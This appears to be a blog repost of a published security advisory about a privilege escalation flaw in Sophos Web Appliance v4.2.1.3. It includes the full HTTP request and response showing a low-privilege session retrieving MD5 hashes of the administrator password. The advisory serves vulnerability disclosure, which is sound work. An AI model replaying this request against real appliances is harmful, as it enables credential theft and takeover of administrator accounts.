Latest YouTube Video
Friday, November 4, 2016
[FD] KL-001-2016-008 : Sophos Web Appliance Privilege Escalation
KL-001-2016-008 : Sophos Web Appliance Privilege Escalation Title: Sophos Web Appliance Privilege Escalation Advisory ID: KL-001-2016-008 Publication Date: 2016.11.03 Publication URL: http://ift.tt/2f1NIGv 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Apppliance Affected Version: v4.2.1.3 Platform: Embedded Linux CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-261: Weak Cryptography for Passwords Impact: Privilege Escalation Attack vector: HTTP 2. Vulnerability Description An unprivileged user can obtain an MD5 hash of the administrator password which can then be used to discover the plain-text password. 3. Technical Description A user with the privileges: Helpdesk, Policy, Reporting, or User Activity can obtain an MD5 hash for the Full Access Administrator account. A valid session identifier is required and is delivered through the STYLE parameter. GET /index.php?c=change_password&STYLE=7151e50b0389755717510f218b1af00c HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close HTTP/1.1 200 OK Date: Tue, 10 May 2016 00:36:43 GMT Server: Apache X-UA-Compatible: IE=7 Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 8798 ... {"currentUser":"test","globalUser":false,"swa_title":"Change Password","usersJS":"[{\"id\":\"default_admin\",\"username\":\"admin\",\"name\":\"Default Administrator\",\"password\":\"f98d0973dffdc3a29ee67167c15b882e\",\"description\":\"Default Administrator Account\",\"admin\":true,\"roles\":\"Full Access Administrator\",\"reporting_groups\":[]},{\"id\":\"5605c1fef6927d2c45a62b0abcba5385\",\"username\":\"test\",\"name\":\"test\",\"password\":\"caeaea5602b40c779b8669b7001f3396\",\"description\":\"asdfghj\",\"admin\":false,\"roles\":[\"helpdesk\",\"policy\",\"reporting\",\"user_activity\"],\"reporting_groups\":[\"all\"]},{\"id\":\"a39244da844197796609fc5b8aad7f3c\",\"username\":\"woot\",\"name\":\"woot\",\"password\":\"f0ce19faed6df0443c80aceea4c7b7ae\",\"description\":\"none\",\"admin\":false,\"roles\":[\"helpdesk\"],\"reporting_groups\":[]}]","cma":{"joined":false,"host":"","is_cma":false,"swa_joined":false,"is_vm":true},"locale":"en","trialMode":true,"licenseDaysLeft":29,"navigation":["\n \n
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment